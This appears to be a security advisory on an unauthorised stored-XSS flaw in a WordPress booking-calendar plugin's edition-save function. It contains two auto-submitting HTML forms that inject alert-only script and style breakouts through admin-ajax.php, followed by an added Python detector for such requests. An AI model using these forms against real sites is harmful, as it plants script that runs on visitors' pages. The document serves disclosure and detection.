The lack of an authorisation check in the cpabc_appointments_save_edition() function can lead to stored XSS via the editionarea parameter when cfwpp_edit is set to ‘js’ or ‘css’.
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="js"/>
<input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
</form>
</body>
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="css"/>
<input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
</form>
</body>
The payload will be triggered on all pages with a booking form.
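For detection, the following added example (not part of the original advisory and not the plugin's code) inspects logged POST requests to admin-ajax.php for the three parameters used above and reports when editionarea contains the end tag of the element it is assumed to be printed in. Assumptions: request bodies are form-urlencoded and available to the inspector (for example from a WAF audit log), the `wordpress_logged_in_` cookie prefix is used as a rough sign of a logged-in session, and `inspect_request`, the flag names and the `blog.example` host are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# End tag that closes the element each edit mode is assumed to be printed in
# (assumption inferred from the two payloads shown on this page).
BREAKOUT = {"js": re.compile(r"</script[\s/>]", re.I),
            "css": re.compile(r"</style[\s/>]", re.I)}

def inspect_request(method, path, headers, body, site_host):
    """Return None if this is not a JS/CSS edition save, else a list of
    suspicious indicators (an empty list means nothing stood out)."""
    if method.upper() != "POST":
        return None
    if not urlsplit(path).path.endswith("/wp-admin/admin-ajax.php"):
        return None
    form = parse_qs(body, keep_blank_values=True)  # CP_ABC_post_edition is sent empty
    mode = form.get("cfwpp_edit", [""])[0].lower()
    if "CP_ABC_post_edition" not in form or mode not in BREAKOUT:
        return None
    hdrs = {k.lower(): v for k, v in headers.items()}
    flags = []
    # Heuristic only: a cookie name proves nothing about the user's capabilities.
    if "wordpress_logged_in_" not in hdrs.get("cookie", ""):
        flags.append("no-login-cookie")
    origin = hdrs.get("origin", "")
    if origin and urlsplit(origin).hostname != site_host:
        flags.append("cross-site-origin")
    if any(BREAKOUT[mode].search(v) for v in form.get("editionarea", [])):
        flags.append("element-breakout")
    return flags

# Constructed sample requests (not captured traffic); blog.example is a placeholder.
SAMPLES = [
    ("POST", "/wp-admin/admin-ajax.php", {"Origin": "https://other.example"},
     urlencode({"CP_ABC_post_edition": "", "cfwpp_edit": "css",
                "editionarea": "</style><svg/onload=alert(/XSS-CSS/)>"})),
    ("POST", "/wp-admin/admin-ajax.php",
     {"Origin": "https://blog.example",
      "Cookie": "wordpress_logged_in_abc=constructed"},
     urlencode({"CP_ABC_post_edition": "", "cfwpp_edit": "css",
                "editionarea": ".booking { color: #333; }"})),
    ("POST", "/wp-admin/admin-ajax.php", {}, urlencode({"action": "heartbeat"})),
]

if __name__ == "__main__":
    for method, path, headers, body in SAMPLES:
        print(inspect_request(method, path, headers, body, "blog.example"))
```

A non-empty result on a site that has not been updated is a reason to review the stored custom JS and CSS of the booking form for injected markup.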